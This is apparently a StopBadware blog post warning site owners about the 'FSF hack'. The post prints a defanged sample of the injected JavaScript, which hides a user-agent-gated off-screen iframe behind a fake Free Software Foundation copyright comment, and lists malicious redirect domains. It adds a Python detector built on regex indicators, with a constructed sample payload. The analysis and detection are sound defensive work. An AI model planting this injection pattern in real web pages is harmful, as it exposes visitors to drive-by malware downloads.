'Free Software Foundation' hack

Posted on October 31, 2014 - 11:30 by ccondon

Happy Halloween, everyone! This is a PSA from the StopBadware website testing team. Our testers have recently been seeing dozens of sites hacked with a malicious iframe that loads content from very bad places. We're referring to this as the FSF hack.

Here is an example of the (sanitized) bad code:

/* Copyright (C) 2007 Free Software Foundation, Inc. hxxp://fsf. org/ */
function JeckPostal() {
    var q = navigator.userAgent;
    var b = (q.indexOf("Chrome") > -1 || q.indexOf("Android") > -1 || q.indexOf("Macintosh") > -1 || q.indexOf("Linux") > -1 || q.indexOf("IEMobile") > -1 || q.indexOf("FreeBSD") > -1 || q.indexOf("iPhone") > -1 || q.indexOf("iPad") > -1);
    if (!b) {
        document.write('<ifram'+'e src="hxxp://faskarao. arawat. com/welcometo15. html" style="position:absolute;left: -700px;top: -700px;" height="132" width="132"></ifr'+'ame>');
    }
}
JeckPostal(); /*

What does it do? This creates an off-screen iframe that loads content from a site which is usually a redirect to an exploit. The site from which the content is being loaded often has a randomly generated hex string as the first label in front of the domain. For example:

hxxp://c22c38348. bigbozz. org
hxxp://309fd22fa. aerofitstudio. net
hxxp://ed757fc56. azov-sportschool2. ru

These sites commonly redirect to maliciously registered pages which attempt to download something onto the user's PC.

Where is it found? This is typically injected at the beginning of JavaScript files loaded into your HTML. It will usually be before any other type of copyright information, and is nearly always preceded by the "2007 Free Software Foundation" comment. 
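To turn the "what does it do" and "where is it found" descriptions above into something a site owner can run over their own files, here is an added detector script. It is not StopBadware's or RedLeg's code: it scores each JavaScript file against the indicators the post names (the fake "2007 Free Software Foundation" comment at the top of the file, a document.write() of an iframe whose tag name is split across concatenated strings, off-screen positioning, and a src host beginning with a random-looking hex label) and extracts the iframe hosts for blocklisting. The file contents and the host name a1b2c3d4e.bad-host.invalid are constructed for the demo, and the indicator weights are an assumption of this example, chosen so that a genuine GPL-licensed file carrying the real FSF copyright line is not flagged on that line alone.

```python
"""Detector for the 'FSF hack' JavaScript injection described in the post.

Added example, not StopBadware's or RedLeg's code. Scores a JavaScript
file against the indicators the post describes and reports the iframe
hosts. Sample file contents and host names below are constructed.
"""
import re
import tempfile
from pathlib import Path
from urllib.parse import urlsplit

# Weak indicators also occur in legitimate files: real GPL-licensed code
# carries the FSF copyright line, and some CDNs use hex-looking hostnames.
WEAK = {
    "fsf_comment": re.compile(r"Copyright \(C\) 2007 Free Software Foundation"),
    "hex_prefix_host": re.compile(r"https?://[0-9a-f]{8,}\.[a-z0-9.-]+", re.I),
}
# Strong indicators: the injection's own hiding tricks (split tag name so a
# naive grep for "<iframe" misses it, and an iframe pushed off-screen).
STRONG = {
    "split_iframe_tag": re.compile(r"<ifram['\"]\s*\+\s*['\"]e", re.I),
    "document_write_iframe": re.compile(r"document\.write\s*\(\s*['\"]<ifram", re.I),
    "offscreen_iframe": re.compile(
        r"position\s*:\s*absolute\s*;\s*left\s*:\s*-\d{3,}px", re.I),
}
FSF_PREFIX = "/* Copyright (C) 2007 Free Software Foundation"
SRC_RE = re.compile(r"src\s*=\s*\\?[\"']([a-z]+://[^\"'\\\s]+)", re.I)


def find_indicators(text):
    """Return the names of every weak and strong indicator present in text."""
    found = [n for n, rx in WEAK.items() if rx.search(text)]
    found += [n for n, rx in STRONG.items() if rx.search(text)]
    return found


def is_injected(text):
    """Flag only when a strong indicator is present and at least one other
    indicator corroborates it, so a bare FSF header is never enough."""
    found = find_indicators(text)
    return any(n in STRONG for n in found) and len(found) >= 2


def iframe_hosts(text):
    """Hostnames from every src="scheme://..." attribute, for blocklisting
    and for checking which redirect chain the iframe points at."""
    return sorted({urlsplit(u).hostname for u in SRC_RE.findall(text)})


def scan_text(text):
    """Full report for one file's contents."""
    return {
        "injected": is_injected(text),
        "indicators": find_indicators(text),
        "hosts": iframe_hosts(text),
        # The post notes the payload sits at the very start of the file,
        # ahead of any legitimate copyright banner.
        "at_file_start": text.lstrip().startswith(FSF_PREFIX),
    }


def scan_tree(root):
    """Scan every *.js under root; return {path: report} for flagged files."""
    hits = {}
    for path in Path(root).rglob("*.js"):
        report = scan_text(path.read_text(encoding="utf-8", errors="replace"))
        if report["injected"]:
            hits[str(path)] = report
    return hits


# Constructed sample mirroring the shape of the post's sanitized code, with
# a placeholder host (not a real infection).
INJECTED_JS = (
    "/* Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/ */"
    " function JeckPostal() { var q = navigator.userAgent;"
    " var b = (q.indexOf(\"Chrome\") > -1 || q.indexOf(\"Android\") > -1);"
    " if (!b) { document.write('<ifram'+'e src=\"http://a1b2c3d4e.bad-host.invalid/welcometo15.html\""
    " style=\"position:absolute;left: -700px;top: -700px;\" height=\"132\""
    " width=\"132\"></ifr'+'ame>'); } } JeckPostal(); /*\n"
    "/* the site's own library follows */ function original() { return 1; }\n"
)
# Constructed clean GPL-style file: has the FSF line but no iframe tricks.
CLEAN_JS = (
    "/* Copyright (C) 2007 Free Software Foundation, Inc. */\n"
    "function gnuHelper() { return 'ok'; }\n"
)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        (Path(tmp) / "js").mkdir()
        (Path(tmp) / "js" / "jquery.min.js").write_text(INJECTED_JS)
        (Path(tmp) / "js" / "gnu.js").write_text(CLEAN_JS)
        for path, report in scan_tree(tmp).items():
            print(path, report)
```

Run it against a copy of the site's document root rather than the live server, and treat the reported hosts as what to look for in your server logs and in any other files the scan did not cover (HTML templates, database-stored content); the hex prefix in front of the domain changes from infection to infection, so the host list is evidence for one site, not a permanent blocklist.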

RedLeg, one of our community forum mods, has a fantastic, very detailed writeup of this hack. If your site is hacked, take a look at RedLeg's info, our tutorials, and these resources to help you clean up!

Thanks to our superstar testing intern Blake for the tip on this one!